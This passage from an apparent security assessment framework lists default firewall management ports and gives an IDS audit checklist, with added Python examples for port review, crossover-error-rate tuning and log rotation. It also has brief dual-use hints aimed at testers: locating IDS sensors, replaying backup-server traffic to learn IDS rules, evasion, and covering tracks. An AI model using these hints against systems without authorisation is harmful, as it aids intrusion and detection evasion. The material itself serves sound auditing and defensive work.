TCP/UDP 1745         | Firewall client control session | Private
TCP 8080             | ISA Web proxy                   | Private
ICMP/8               | Echo request                    | Private
TCP/UDP 3000 to 3700 | ISA NAT port pool               | Private
Comments: Open by default
L.18.1.14 NETSCREEN FIREWALL
Port    | Service Identified | Available To
TCP 23  | Telnet             | Private
TCP 80  | HTTP               | Private
TCP 443 | HTTPS              | Private
ICMP/8  | Echo Request       | Private
Comments: Open by default
L.18.1.15 NORTEL ASF
Port      | Service Identified | Available To | Comments
TCP 18264 | FW1_ICS_Service    | Private      | Management/open
TCP 80    | HTTP               | Private      |
TCP 81    | Web based Mgmt     | Private      |
UDP 123   | NTP                | Private      |
UDP 161   | SNMP               | Private      |
TCP 389   | LDAP               | Private      |
L.18.1.16 NOVELL BORDER MANAGER
Port      | Service Identified            | Available To | Comments
TCP 413   | Storage Mgmt Service protocol | Private      |
TCP 427   | Storage Location              | Private      |
UDP 427   | Storage Location              | Private      |
TCP 443   | Web based administration      | Private      |
UDP 520   | RIP                           | Private      |
TCP 524   | NCP                           | Private      |
UDP 524   | NCP                           | Private      |
TCP 636   | LDAP over SSL                 | Private      |
TCP 2000  | CS Audit Proxy                | Private      |
TCP 2200  | Web based administration      | Private      | Administration/open
TCP 2211  | Web based administration      | Private      |
TCP 3351  | Btrieve                       | Private      |
TCP 6000  | X Windows                     | Private      |
TCP 6901  | Jet Stream                    | Private      |
TCP 8008  | Web based administration      | Private      | Administration/open
TCP 8009  | Web based administration      | Private      |
TCP 21571 | Novell Licensing Service      | Private      |
TCP 40193 | Storage management Req.       | Private      |
ICMP/8    | Echo Request                  | Private      | Open by default
Comments: web based administration ports are Administration/open; the remaining ports are open by default.
L.18.1.17 NETGEAR PROSAFE
Port    | Service Identified | Available To
TCP 80  | HTTP               | Private
TCP 443 | HTTPS              | Private
L.18.1.18 WATCHGUARD FIREBOX
Port     | Service Identified            | Available To | Comments
ICMP/8   | Echo Request                  | Private      |
TCP 21   | FTP proxy                     | Private      |
TCP 113  | Auth                          | Private      |
TCP 3053 | Management Control            | Private      |
TCP 4105 | Management connection Control | Private      | Administration/open
TCP 4110 | DVCP VPN manager              | Private      |
TCP 4111 | High availability             | Private      |
TCP 9001 | Management Control            | Private      |
TCP 4100 | Authentication                | Private      | Needs to configure
Comments: Management/open by default
L.18.1.19 CHECKPOINT FIREWALL
Port      | Service Identified                | Available To | Comments
256/tcp   | FW1                               | Private      | Management
257/tcp   | FW1_log                           | Private      |
258/tcp   | FW1_mgmt                          | Private      |
259/tcp   | FW1_clntauth, FW1_clntauth_telnet | Private      |
259/udp   | RDP                               | Private      |
260/udp   | FW1_snmp                          | Private      |
261/tcp   | FW1_snauth                        | Private      |
264/tcp   | FW1_topo                          | Private      |
265/tcp   | FW1_key                           | Private      |
900/tcp   | FW1_clntauth, FW1_clntauth_http   | Private      |
981/tcp   | - not predefined -                | Private      |
2746/udp  | VPN1_IPSEC_encapsulation          | Private      |
5004/udp  | MetaIP-UAT                        | Private      |
8116/udp  | - not predefined -                | Private      |
9281/udp  | SWTP_Gateway                      | Private      |
9282/udp  | SWTP_SMS                          | Private      |
18182/tcp | FW1_ufp                           | Private      |
18183/tcp | FW1_sam                           | Private      |
18184/tcp | FW1_lea                           | Private      |
18185/tcp | FW1_omi                           | Private      |
18186/tcp | FW1_omi-sic                       | Private      |
18187/tcp | FW1_ela                           | Private      |
18190/tcp | CPMI                              | Private      |
18191/tcp | CPD                               | Private      |
L.18.1.20 CHECKPOINT FIREWALL
Port      | Service Identified                | Available To | Comments
18192/tcp | CPD_amon                          | Private      | Management
18193/tcp | FW1_amon                          | Private      |
18202/tcp | CP_rtm                            | Private      |
18205/tcp | CP_reporting                      | Private      |
18207/tcp | FW1_pslogon                       | Private      |
18208/tcp | FW1_CPRID                         | Private      |
18209/tcp | - not predefined -                | Private      |
18210/tcp | FW1_ica_pull                      | Private      |
18211/tcp | FW1_ica_push                      | Private      |
18212/udp | FW1_load_agent                    | Private      |
18221/tcp | CP_redundant                      | Private      |
18231/tcp | FW1_pslogon_NG                    | Private      |
18232/tcp | FW1_sds_logon                     | Private      |
18233/udp | FW1_scv_keep_alive                | Private      |
18234/udp | tunnel_test                       |              |
18241/udp | E2ECP                             | Private      |
18262/tcp | CP_Exnet_PK                       | Private      |
18263/tcp | CP_Exnet_resolve                  | Private      |
18264/tcp | FW1_ica_services                  | Private      | Management/Open by default
18265/tcp | FW1_ica_mgmt_tools                | Private      | Management
19190/tcp | FW1_netso                         | Private      |
19191/tcp | FW1_uaa                           | Private      |
19194/udp | CP_SecureAgent-udp                | Private      |
19195/udp | CP_SecureAgent-udp                | Private      |
65524/tcp | FW1_sds_logon_NG                  | Private      |
L.18.1.21 SYMANTEC ENTERPRISE FIREWALL
Port     | Service Identified        | Available To     | Comments
TCP 21   | FTP                       | Private & Public |
TCP 23   | TELNET                    | Private & Public |
TCP 25   | SMTP                      | Private & Public |
TCP 80   | HTTP                      | Private & Public |
TCP 416  | Firewall Mgmt Port        | Private & Public |
TCP 417  | Firewall Mgmt Port        | Private & Public |
TCP 418  | FW Remote Mgmt Port       | Private & Public |
UDP 500  | ISAKMP                    | Private & Public |
TCP 888  | OOB-Daemon                |                  |
TCP 2456 | Web based Management Port |                  |
TCP 1344 | AV scan engine            |                  | Bind to local host
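An added example, not from ISSAF, that reviews a constructed port scan of a firewall against a few rows copied from the default-port tables above (SonicWall, Lucent Access Point 300, Check Point), flagging defaults reachable from a side the vendor table does not list and clear-text management services; which services count as clear-text management is this example's assumption.

```python
"""Review observed listening ports of a firewall against the ISSAF L.18 default-port tables.

Added example, not part of ISSAF. DEFAULTS transcribes a few rows from the
tables above; OBSERVED is a constructed scan result for a Check Point gateway;
CLEARTEXT_MGMT is this example's assumption about which services carry
unencrypted management traffic (cf. the L.16.6 countermeasures: HTTPS, SSH).
"""

# vendor -> (proto, port) -> (service identified, available to), copied from the L.18 tables
DEFAULTS = {
    "sonicwall": {
        ("tcp", 23): ("TELNET", "Private"), ("udp", 23): ("TELNET", "Private"),
        ("udp", 69): ("TFTP", "Private"),
        ("tcp", 80): ("HTTP", "Private"),
        ("udp", 500): ("ISAKMP", "Private"),
    },
    "lucent_ap300": {
        ("tcp", 22): ("SSH", "Private & Public"),
        ("tcp", 23): ("Telnet", "Private & Public"),
        ("tcp", 80): ("HTTP", "Private & Public"),
        ("udp", 161): ("SNMP", "Private & Public"),
        ("tcp", 443): ("HTTPS", "Private & Public"),
    },
    "checkpoint": {
        ("tcp", 256): ("FW1", "Private"),
        ("tcp", 257): ("FW1_log", "Private"),
        ("tcp", 258): ("FW1_mgmt", "Private"),
        ("udp", 259): ("RDP", "Private"),
        ("tcp", 18190): ("CPMI", "Private"),
        ("tcp", 18191): ("CPD", "Private"),
    },
}

# Assumption of this example: management services whose traffic is not encrypted.
CLEARTEXT_MGMT = {"telnet", "http", "snmp", "tftp"}


def allowed_sides(available_to):
    """'Private & Public' -> {'private', 'public'}; 'Private' -> {'private'}."""
    return {part.strip().lower() for part in available_to.split("&")}


def review(vendor, observed):
    """observed: iterable of (proto, port, side) with side 'private' or 'public'.

    Returns (severity, message) findings in input order:
      high   - default port reachable from a side the vendor table does not list
      medium - clear-text management service listening at all
      info   - listening port that is not a documented default
    """
    defaults = DEFAULTS[vendor]
    findings = []
    for proto, port, side in observed:
        service, avail = defaults.get((proto.lower(), port), (None, None))
        if service is None:
            findings.append(("info", f"{proto}/{port} on {side}: not a documented "
                                     f"{vendor} default, confirm it is intentional"))
            continue
        if side.lower() not in allowed_sides(avail):
            findings.append(("high", f"{proto}/{port} ({service}) reachable from {side}; "
                                     f"vendor default is {avail}"))
        if service.lower() in CLEARTEXT_MGMT:
            findings.append(("medium", f"{proto}/{port} ({service}) is clear-text management; "
                                       f"disable it or use HTTPS/SSH"))
    return findings


def severities(findings):
    """Just the severity column, for quick summaries."""
    return [sev for sev, _ in findings]


# Constructed scan of a Check Point gateway taken from both sides of the firewall.
OBSERVED = [
    ("tcp", 256, "private"),   # FW1 on the private side: matches the table
    ("tcp", 256, "public"),    # FW1 exposed on the public side
    ("tcp", 18190, "public"),  # CPMI exposed on the public side
    ("tcp", 2222, "private"),  # not in the default table
]

if __name__ == "__main__":
    for sev, msg in review("checkpoint", OBSERVED):
        print(f"[{sev}] {msg}")
```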
L.19 FURTHER READING[S]
M INTRUSION DETECTION SYSTEM SECURITY ASSESSMENT
M.1 DESCRIPTION
Networks are vulnerable to attacks against which a firewall alone may not be enough. An Intrusion Detection System (IDS) provides an additional layer of protection to a firewall. An IDS monitors the network’s local host devices and network traffic for signs of attempted attacks and network security breaches. They can be deployed on an individual host or on a part of the network. Their primary purpose is to examine the local or network traffic for intrusions and report these intrusions to the security administrator. Firewall and IDS systems together provide a good layer of protection against an intruder.
M.1.1 What is an IDS?
An IDS or Intrusion Detection System collects information from a variety of system and network sources, and analyzes the information for signs of intrusion (attacks coming from outside the local network) and misuse (attacks originating inside the network).
M.1.2 Benefits of an IDS
Intrusion Detection Systems can perform a variety of functions like:
• Monitoring and analysis of user and system activity
• Auditing of system configurations and vulnerabilities
• Assessing the integrity of critical system and data files
• Recognition of activity patterns reflecting known attacks
• Statistical analysis for abnormal activity patterns
• Operating system audit trail management, with recognition of user activity reflecting policy violations
The combination of these features allows system or network administrators to more easily handle the monitoring, audit, and assessment of their systems and networks to find signs of outside intrusions or local misuse of computer systems.
M.1.3 Types of IDS
M.1.3.1 HOST-BASED – INTRUSION DETECTION SYSTEMS (HIDS)
Host intrusion detection systems are intrusion detection systems that are installed locally on host machines. HIDS can be installed on many different types (roles) of machines, namely servers, workstations and notebook computers. Traffic transmitted to the host is analyzed for potentially malicious packets within the data transmission. HIDS are more focused on changes on the local machine, compared to the network-based focus of a Network-based Intrusion Detection System (NIDS). HIDS are also more platform specific, and several HIDS are available for Microsoft Windows. A few HIDS also function in UNIX and other OS environments. GFI LANguard is one such product.
M.1.3.2 NETWORK-BASED – INTRUSION DETECTION SYSTEMS (NIDS)
A NIDS analyzes all packets at the network level to determine the occurrence of an intrusion. A NIDS agent places the network interface card into “promiscuous” mode and audits all traffic crossing the interface. As a general rule, it should be able to analyze all traffic within a specific network segment. Therefore, with switched networks, a NIDS agent should be connected to the monitoring port of the hub. A NIDS agent functions as an appropriate software module that resides on one of the servers within a LAN segment. However, the volume of packets sent over contemporary LANs is enormous. If the NIDS agent has inadequate capacity to handle extreme loads, it can miss packets due to congestion on the network link that it is monitoring and fail to collect the next packets that are received. Therefore, a NIDS must function close to real time. On the other hand, a NIDS agent itself may overload the system it resides on and “incapacitate” the system from performing other tasks. This weakness spurs NIDS manufacturers to develop data collecting agents as a dedicated system to be installed on a separate robust PC (for instance, NFR NID-100 is offered as a CD-ROM to boot the system). Another option is a complete system encompassing both hardware and software (for example, Cisco NetRanger is Cisco software running on the Solaris operating system).
NIDS are installed to remediate problems having characteristic attacks (for example ping of death or IIS .ida). They can also be used to deal with lesser events that are preparative steps for an attack (for example, port scan).
For detecting aberrant traffic, NIDS use some other techniques as presented below.
M.1.3.3 STATISTICAL ANOMALY
Increasingly, HIDS are using technologies which allow them to detect alterations to
important system files and assets. As a rule, the files to check are periodically checksummed and compared against a checksum database. If a checksum does not match
the current result stored in a checksum database, this means that the file integrity is
suspect. Obviously, this rule can be used to monitor only critical non-alterable system
files.
Certain HIDS are able to verify features of certain assets. It is well known, for example,
that system log files are incremental files. Therefore, the system should be configured so
that an alarm is triggered as soon as the system detects any abnormal logs.
A number of products that deal with monitoring of files and assets are available on the
market. They are denoted with a FIA (File Integrity Assessment) abbreviation. The first
program likely to employ file integrity assessment by checksum verification was Tripwire.
When deploying HIDS software, attention must be paid to providing security for the databases used by the system (event detection rule files, checksum files). Imagine if your operating system is under attack and the attacker knows that your OS has HIDS coverage. By making changes to the system, the attacker may also modify the database containing signatures of changed files. Therefore, it is a good idea to store signatures and other databases, as well as configuration files and HIDS binaries, using a non-erasable medium – for example, a write-protected diskette or a CD-ROM.
M.1.3.4 PATTERN MATCHING
NIDS have used pattern-matching since their origins. Each packet on the network is
received by the listening system. The NIDS then filters and compares network packets
on a byte-code matching basis, against a database of known attack signatures (or
patterns). The attack signature is a known technique used by anti-virus programs. CA
eTrust uses the same engine – InoculateIT – as the anti-virus software of the same
manufacturer. This method is easy to deploy, but requires a powerful system to reside
on. In addition, there is an exponential relation between the amount of processed data or
detected attacks (signatures) and the demand for computational power.
M.2 PURPOSE
The purpose of this document is to offer a full overview on Intrusion Detection Systems and the assessment of this kind of system, from an auditor/pen-tester point of view. This document can be used as a reference for any system audit.
M.3 REQUIREMENT
[Text]
M.3.1 Understand Organization’s environment
• Determine the size and complexity of the organization
• Determine the organization’s dependence on information systems
• Understand the organization’s mission
• Understand the organizational structure and the roles and responsibilities of the key IT personnel involved, and also of the IT staff managing the Intrusion Detection System
• How information systems are used to support the organization in achieving its mission
• Understand the threat objects and associated risks to the organization
M.3.2 Technical Requirements
M.4 TERMINOLOGY
[Text]
M.5 HISTORY
Several methods to counter the emergence of worms have been investigated. Prominent among these are network-based Intrusion Detection Systems, which monitor the network for any suspicious activity. When such activity is seen, it is immediately reported via a pre-determined notification method.
The notion of a DIDS has been around since the late 1980s. However, it wasn’t until the
global connectivity of the Internet that the importance of correlated data from various
agents became important to understand major occurrences of intrusions. For this
reason, large scale DIDS came into effect in the late 1990s. Robbins [46] outlines the
primary motivations for moving from individual IDS to a DIDS. DIDS have also proven to
be effective in the rapid assessment of virus activity across the Internet. A good example
of this was the detection of the 2001 Lion worm at the Internet Storm Center at SANS
(SysAdmin, Audit, Network, Security Institute [4]). Distributed Intrusion Detection
Systems are now widely accepted as standards for detecting intrusions on a worldwide
scale. They receive data from various sources such as personal firewall logs, enterprise
IDS logs and educational institutes. An analysis is carried out on the data and the
required authorities are contacted via e-mail. This helps many ISPs and domain owners
to find computers running malicious software on their networks.
M.6 OBJECTIVE
The objective of an IDS audit is to find out if the IDS functions up to the standards agreed upon in the security check-list. The audit should help determine if the IDS meets baseline requirements.
M.6.1 Perspective One
e.g. Security Assessor/Penetration Tester
M.6.2 Perspective Two
e.g. System Administrator
M.7 EXPECTED RESULT
[Text]
M.8 METHODOLOGY / PROCESS
Information Gathering
Information gathering is the first step of an audit. The auditor/pen-tester must obtain as much information as possible about the company/organization he is auditing. Information can be obtained using passive methods (Passive Information Gathering) and active methods (Active Information Gathering).
• Passive Information Gathering
Passive information gathering is a method of obtaining information about the specific company/organization through non-active methods, including social engineering. The needed information can be obtained by using regular public sources of information, like search engines, whois queries, USENET posts, mailing lists and other sources.
Any method of indirect communication with the audited company/organization using virtual or real channels to obtain the needed information can be considered passive information gathering. The chief point of this method is to not raise any suspicions on the client end.
• Active Information Gathering
Active information gathering is a method of obtaining information about the specific company/organization by using active tools. Information can be obtained by scanning the company’s networks for systems, open ports and vulnerabilities, to make an overview of the level of security that the specific company/organization has.
Social engineering can also be used to obtain information about the company audited.
Any method of direct communication with the audited company/organisation using virtual or real channels to obtain specific information about its systems can be considered active information gathering.
Identify Intrusion Detection Systems
Vendor | IDS                           | TCP/IP Protocol[s] | Protocol[s] | Port / Options
       | Snort                         |                    |             |
       | Dragon                        |                    |             |
       | Cisco Secure IDS              |                    |             |
       | Network Flight Recorder (NFR) |                    |             |
• Identify Sensor
o Attack on the target; if the sensor is configured in push-data mode, it will reveal its identity.
• Identify Management Station and Centralized Logging System
Scan for Default Ports
Perform Service Scan
Perform Banner Grabbing
If one has access to a hub and to network transmissions on the internal network of an organization, watch for huge data transfers, typically during off-office hours (between 10pm and 7am). The data transfers will indicate where the data is being stored, aka the back-up machines. Back-up machines are also generally not production machines, and their security priority may be a bit low. Replay attacks on backup servers can give one the IDS data that the IDS engine is working on. The configuration of an IDS can give the attacker knowledge about the IDS rules and hence knowledge to circumvent the IDS rules.
Refer section -- --
Identify Product specific vulnerabilities
Perform Exploit Research and Proof of Concept
Network Mapping
Refer ISSAF Methodology Section
Vulnerability Identification
Refer ISSAF Methodology Section
Penetration
Refer ISSAF Methodology Section
Gaining Access and Privileges Escalation
Refer ISSAF Methodology Section
Enumerate Further
Refer ISSAF Methodology Section
Maintaining Access
Refer ISSAF Methodology Section
Covering the Tracks
Refer ISSAF Methodology Section
Audit
Refer ISSAF Methodology Section
Reporting
Refer ISSAF Methodology Section
M.8.1 Clean-up and Destroy Artifacts
Refer ISSAF Methodology Section
M.9 AUDIT INTRUSION DETECTION SYSTEM
M.10 PROCESS ISSUES
M.10.1 Is there any process to minimize false positives?
M.10.2 Is there any process to minimize false negatives?
M.10.3 Is there any process to analyze the IDS logs on a regular basis?
Typically IDS logs should be analyzed by humans to verify any machine error that may be occurring. Visual determination of IDS logs is very important to the development of accurate IDS rules. There is quite a cognitive gap between determination of a problem by a system and by a human being.
M.10.4 Is there any process to tune the Firewall/Router rule-base based on IDS alerts?
Dynamic configuration of the firewall/router rule-base from IDS alerts is generally
achieved by Intrusion Prevention Systems. However, one must carefully analyze the logs
before allowing such permissions. It is critical that the crossover error rate, CER (the
acceptable value where the false positive and false negative rates cross each other on a
graph), be set according to the acceptable risks to the system being secured. This is
generally done during a training period for the IDS, where manual intervention is needed
to identify the acceptable value of CER.
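As an added illustration of how the CER is located during such a training period (this example is not part of ISSAF; the alert scores and analyst verdicts are constructed sample data, not output of any real sensor), the Python below sweeps a detection threshold over scored alerts, computes the false positive and false negative rate at each point and picks the threshold where the two curves cross. A second function shows the tuning step the text describes: choosing the operating threshold from the maximum miss rate the risk owner is willing to accept.

```python
from typing import Iterable, List, Sequence, Tuple

# Constructed sample: (IDS alert score, analyst verdict "this was a real intrusion").
# Made-up values for illustration only.
SAMPLE_ALERTS: List[Tuple[int, bool]] = [
    (95, True), (90, True), (85, True), (80, False), (75, True),
    (70, False), (65, True), (60, False), (55, False), (50, True),
    (45, False), (40, False), (35, False), (30, True), (25, False),
]


def error_rates(alerts: Sequence[Tuple[int, bool]], threshold: int) -> Tuple[float, float]:
    """Return (false positive rate, false negative rate) when every alert with
    score >= threshold is escalated and every alert below it is suppressed."""
    positives = [score for score, real in alerts if real]
    negatives = [score for score, real in alerts if not real]
    false_positives = sum(1 for score in negatives if score >= threshold)
    false_negatives = sum(1 for score in positives if score < threshold)
    fpr = false_positives / len(negatives) if negatives else 0.0
    fnr = false_negatives / len(positives) if positives else 0.0
    return fpr, fnr


def crossover_error_rate(alerts: Sequence[Tuple[int, bool]],
                         thresholds: Iterable[int]) -> Tuple[int, float]:
    """Sweep the thresholds and return (threshold, rate) at the point where the
    false positive and false negative curves are closest: the CER."""
    best_gap, best_threshold, best_rate = None, None, None
    for threshold in thresholds:
        fpr, fnr = error_rates(alerts, threshold)
        gap = abs(fpr - fnr)
        if best_gap is None or gap < best_gap:
            best_gap, best_threshold, best_rate = gap, threshold, (fpr + fnr) / 2
    return best_threshold, best_rate


def choose_threshold(alerts: Sequence[Tuple[int, bool]],
                     thresholds: Iterable[int], max_fnr: float) -> int:
    """Tuning step: the highest threshold (fewest false positives) whose miss
    rate stays within what the risk owner accepts. Raises if none qualifies."""
    acceptable = [t for t in thresholds if error_rates(alerts, t)[1] <= max_fnr]
    if not acceptable:
        raise ValueError("no threshold meets the accepted false negative rate")
    return max(acceptable)


if __name__ == "__main__":
    sweep = range(0, 101, 5)
    threshold, rate = crossover_error_rate(SAMPLE_ALERTS, sweep)
    print(f"CER at threshold {threshold}: {rate:.3f}")
    print("operating threshold for at most 15% misses:",
          choose_threshold(SAMPLE_ALERTS, sweep, 0.15))
```

On the constructed data the curves cross at threshold 65; capping the miss rate at 15% instead moves the operating point down to 50, trading more false positives for fewer missed intrusions, which is exactly the judgement the training period is meant to settle.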
M.10.5 Is there any incident response process based on IDS alerts?
M.10.6 Is there any action taken based on intrusions identified in the past?
M.10.7 Is there any process to address any performance issue raised by the IDS?
As one can see, an IDS evaluates network flow to determine an attack. The IDS
therefore forms a performance bottleneck. Sufficient resources should be provided to the
IDS so that its performance is at a level acceptable for the protected system.
The performance of the network and of the end systems that are protected by the IDS are
important considerations for this. If an extremely fast network and systems are
protected by an IDS, the IDS becomes a bottleneck. On the other hand, if a slow
system and network are protected by a rapid IDS, resources devoted to the IDS are
wasted, because faster processing by the IDS does not result in any performance gain
on the network or systems.
One way of increasing IDS performance is by placing a rule-based firewall in front of the
IDS. The firewall will drop insignificant or known-bad packets, such as certain ICMP
packets. Thus IDS performance can be increased by reducing the packets it receives.
M.10.8 Is there any process for manageability of data?
Since an IDS works on log data, the data volume on the IDS system increases exponentially
with the distance it is placed at from the end systems. It should be noted that an IDS is not
typically suited for boundary detection. In practice, a log rotation policy is implemented to
reduce the storage on the IDS. This can be achieved via cron scripts and a network
storage appliance such as a SAN/NAS.
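The kind of rotation job such a cron entry would run, as an added example that is not part of ISSAF: it compresses sensor logs once they are a day old and deletes archives past the retention period, and it deliberately keeps the original timestamp on the archive so the retention clock runs from the log's date rather than from the day it was compressed. The directory layout, file names and log lines are constructed for the demonstration.

```python
import gzip
import os
import shutil
import tempfile
import time
from pathlib import Path
from typing import List, Optional, Tuple

DAY = 86400


def rotate_ids_logs(log_dir: str, compress_after_days: int = 1,
                    delete_after_days: int = 30,
                    now: Optional[float] = None) -> Tuple[List[str], List[str]]:
    """Compress *.log files older than compress_after_days into *.log.gz and
    delete *.log.gz archives older than delete_after_days. The active log
    (modified today) is never touched. Returns (compressed, deleted) names."""
    now = time.time() if now is None else now
    compressed: List[str] = []
    deleted: List[str] = []
    # Snapshot the listing first so archives created in this pass are not revisited.
    for path in sorted(Path(log_dir).iterdir()):
        if not path.is_file():
            continue
        mtime = path.stat().st_mtime
        age_days = (now - mtime) / DAY
        if path.suffix == ".log" and age_days >= compress_after_days:
            archive = path.with_name(path.name + ".gz")
            with open(path, "rb") as src, gzip.open(archive, "wb") as dst:
                shutil.copyfileobj(src, dst)
            # Preserve the log's own timestamp so retention counts from its date.
            os.utime(archive, (mtime, mtime))
            path.unlink()
            compressed.append(path.name)
        elif path.name.endswith(".log.gz") and age_days >= delete_after_days:
            path.unlink()
            deleted.append(path.name)
    return compressed, deleted


def make_sample_log_dir() -> str:
    """Create a constructed sample directory (not real IDS data): today's active
    log, a three-day-old log, a ten-day-old archive and a 45-day-old archive."""
    log_dir = Path(tempfile.mkdtemp(prefix="ids-logs-"))
    now = time.time()
    plain = [
        ("alert-today.log", 0, "08/14-09:51:02 [**] constructed sample alert [**]\n"),
        ("alert-3d.log", 3, "08/11-04:12:33 [**] constructed sample alert [**]\n"),
    ]
    for name, age, text in plain:
        p = log_dir / name
        p.write_text(text)
        os.utime(p, (now - age * DAY, now - age * DAY))
    for name, age in (("alert-10d.log.gz", 10), ("alert-45d.log.gz", 45)):
        p = log_dir / name
        with gzip.open(p, "wt") as f:
            f.write("archived constructed alert\n")
        os.utime(p, (now - age * DAY, now - age * DAY))
    return str(log_dir)


def list_logs(log_dir: str) -> List[str]:
    """Sorted file names currently in the log directory."""
    return sorted(p.name for p in Path(log_dir).iterdir())


if __name__ == "__main__":
    sample = make_sample_log_dir()
    print(rotate_ids_logs(sample), list_logs(sample))
```

Run from cron with the real sensor directory in place of the sample one; shipping the compressed archives to the SAN/NAS export is then a matter of pointing `log_dir` at the mount or adding a copy step after compression.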
M.10.9 Does the IDS Management Team know its operating mechanism?
Typically the management team has at least one person devoted to writing new IDS
rules or examining IDS alerts. However, during setup and configuration larger personnel
support may be devoted to setting up the baseline for an IDS.
M.10.10 Is the number of people having access to the IDS small and under control?
M.11 IS THERE ANY PROCESS FOR TRAINING IDS MANAGEMENT TEAM?
M.12 FEATURES
• Does it provide any feature for Remote Management of Sensors, Centralized Log
Server and other Devices?
• Is there any module for reporting?
• Does it have features for reactive response to the firewall/router to block certain
traffic accordingly?
• Is the system scalable (e.g. can many sensors be monitored/managed)?
• Does it have the capability to analyze all kinds of high-level applications in sufficient
detail?
• Are the IDS reporting tools efficient for the following?
  o Provides a list of events
  o Provides nice GUIs with icons representing events
M.13 PLACEMENT OF IDS COMPONENTS
Explain it as per our network diagram. I will make it by 16th August….
• Identify placement of critical assets in the enterprise network.
• Identify threats to critical systems.
• Identify critical assets (server / applications / services).
• Is the device placed for appropriate intrusion detection? (e.g. placement of a
sensor on the external interface of the router.)
• Make sure traffic is not creating any network latency problem.
• Are multiple sensors implemented?
M.14 SENSOR
M.14.1 Detection of sensor (Stealth)
• Which methods of data transfer does it support (Push Data or Pull Data)?
  o Is the system configured to push data to the analysis engine?
    ƒ Advantage – Reports attacks as they occur.
    ƒ Disadvantage – The sensor sends packet responses, which can reveal the
      identity of the sensor.
    ƒ Countermeasure – Configure the sensor to send data periodically even if an
      attack has not occurred.
  o Is the analysis engine configured to pull data (pull data mode) from the sensor?
    ƒ Advantage – Sends alerts.
    ƒ Disadvantage – Doesn’t give detail.
    ƒ Remarks – To get detail, queries need to be made.
M.14.2 Is the Sensor plugged into the Network?
This check seems very funny, but many times it has been seen that an IDS is deployed in
an enterprise but the sensor is not even plugged in.
M.14.3 Does the Sensor have a low effect on Network/Host Performance?
M.14.4 Speed of packet capture
M.14.5 Is the Communication between Sensors and the Centralized Log Server Robust?
M.14.6 Type of deployment (SPAN / Standalone)
M.14.7 Security on sensor
• Security on device
• Security during data transit (SSL)
M.14.8 OS and dependencies
M.15 DETECTION ENGINE
M.15.1 Is it analyzing all Network Protocols?
M.15.2 Are the latest Signatures Updated?
M.15.3 Are the Signatures downloaded via a secure method?
M.15.4 Is it detecting Simple Attacks?
Perform an attack using any assessment/hacking tool (e.g. nessus, nikto etc…) on the
target and see whether the IDS is detecting it or not.
M.15.5 Is it Differentiating between Normal and Abnormal traffic?
• Example One: Spoofing attack
• Example Two:
• Example Three:
M.15.6 Are there any Parameters that crash the system?
M.15.7 Alerts
• Does it have an alert mechanism by e-mail, alert, pager, SMS?
• Is it alerting for suspicious modification of files and databases?
• Is it alerting for the addition of any binary?
• Is it alerting for suspicious modification of log files, system files and user
accounts?
• Is the method for alerting relevant staff robust and smooth?
M.15.8 Packet ripping techniques used
M.15.9 Level of packet ripping and inspection
M.15.10 Inspection techniques used
M.15.11 Fragment reassembly
M.15.12 Reassembly buffer size (Buffer overflows check)
M.15.13 Detection of DOS, DDOS Attacks
M.15.14 Detection of standard and nonstandard port-scan / host-scan
M.15.15 Central processor load
M.15.16 Load bearing capacity (No of Sensors)
M.15.17 Security during transit (SSL)
M.15.18 Is it detecting Attacks generated internally by Authorized personnel over a long
period of Time?
M.15.19 Is it taking advantage of logs produced by other systems?
M.15.20 IDS Evading
M.15.21 Security on system
M.15.22 OS and Dependencies
M.16 RULE CONFIGURATION AND MANAGEMENT INTERFACE
M.16.1 Rule update procedure (Encrypted and Digitally signed…)
M.16.2 Rule loading system (dynamic loading / static loading)
M.16.3 Ease of rule configuration (Addition / Modification)
M.16.4 Depth of rules (Layer 2 to Layer 7)
M.16.5 Storage / Version Control and Security of Rules
M.16.6 Ease of use of the Management Interface
M.16.7 Configurable systems (Control over rule manager / sensor / logging engine)
M.16.8 Use of database for operations
M.16.9 Database security
M.16.10 Are filters implemented to Minimize False Positives?
M.17 LOGGING SYSTEMS
M.17.1 Reliability of Alarm Logging
When a high volume of log data is generated, does the system have the capability to
log all of it?
M.17.2 Type of logging supported
M.17.3 Topologies supported
M.17.4 Levels / depth of logging
M.17.5 Security during transit
M.17.6 High availability configurations
M.17.7 Backend database and security
M.17.8 OS/dependencies
M.18 LIST OF COMMON IDS/IPS PRODUCTS
This is a list of IDS commonly used on the Internet and other networks these days. It
includes the tool name, a link to find it and a brief description.
1. Anzen Flight Jacket (http://www.anzen.com/afj/)
This is a user-programmable, real-time network monitoring system for intrusion detection
and traffic analysis. Anzen Flight Jacket (AFJ) passively examines network traffic,
identifying attacks, probes, and other anomalous events in real-time. AFJ's distributed
architecture allows for centralized management of remote sensors deployed throughout
an enterprise network.
2. Authd (ftp://ftp.cerias.purdue.edu/pub/tools/)
Free authentication server daemon software. It makes it easier to trace attackers; a simple
tool for IDS use.
3. BlackICE Defender (http://www.networkice.com/Products/BlackICE/default.htm)
This is a regular firewall, but it has some simple IDS rules. A medium tool, especially for
home use and for regular users.
4. Centrax http://www.cybersafe.com/solutions/centrax.html
Here is a complete intrusion detection suite that integrates network and host-based
intrusion detection, vulnerability assessment, and audit policy management into a single,
easy-to-use package. Centrax provides the most effective balance between network and
host technologies, providing maximum protection against all threats to an enterprise. The
system also includes vulnerability analysis and policy management to complete its
comprehensive detection and response capability. One of the best IDSs around
5. Cisco Secure IDS
http://www.cisco.com/warp/public/cc/cisco/mkt/security/nranger/index.shtml
An enterprise-scale, real-time, intrusion detection system designed to detect, report, and
terminate unauthorized activity throughout a network. The industry's first intrusion
detection system, The Cisco Secure Intrusion Detection System is the dynamic security
component of Cisco's end-to-end security product line, best all-rounder.
6. Clog (ftp://ftp.cerias.purdue.edu/pub/tools/)
Another IDS from CERIAS. This one, like Authd, is free.
7. VIRENT (http://www.afirm.org/virent.html/)
A "Honey pot"-like IDS. Can emulate any existing network. Has active discovery
capabilities. Has rapid response capabilities. Provides a platform for network security
simulations. Provided as a turnkey solution. Including all hardware, software and
training. SANE™ certified for the support of AFIRM (IPSEC, ANSA and OPSEC support
spec'd).
8. Vanguard Enforcer (http://viplink.com/products/enforcer.cfm)
"Monitors the security systems and facilities that protect critical data and other resources
on your mainframe 24 hours a day seven days a week. Enforcer makes certain that the
standards, policies, rules and settings defined by your security experts are in force and
stay in force. With Vanguard Enforcer, you will never have to wonder whether the
security implementation on your mainframe is protecting your critical resources
effectively. This technology ensures that security on your mainframe systems
continuously adheres to "best practices" standards and your own security policies."
9. TTY-Watcher (ftp://ftp.cerias.purdue.edu/pub/tools/)
Another free tool from CERIAS, a user monitoring tool
10. Tivoli Cross Site for Security
